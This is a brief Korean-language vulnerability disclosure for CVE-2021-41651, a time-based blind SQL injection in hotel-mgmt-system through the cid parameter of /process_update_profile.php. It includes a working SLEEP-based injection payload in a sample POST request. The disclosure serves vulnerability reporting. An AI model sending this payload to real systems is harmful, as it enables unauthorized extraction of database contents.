
CVE-2021-41651에 대한 개념 증명 익스플로잇으로, hotel-mgmt-system에서 cid 파라미터를 통해 인증되지 않은 시간 기반 블라인드 SQL 인젝션을 시연하여 MySQL에서 민감한 데이터를 추출할 수 있습니다.
CVE-2021-41651 hotel-mgmt-system의 SQL 인젝션
hotel-mgmt-system은 인증되지 않은 시간 기반 블라인드 SQL 인젝션 공격에 취약합니다.
/process_update_profile.php 페이지의 cid 매개변수는 사용자 입력을 검증하지 않으므로, 공격자는 MySQL 데이터베이스에서 민감한 데이터를 추출할 수 있습니다.
URL: /process_update_profile.php
매개변수: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
2021년 9월 23일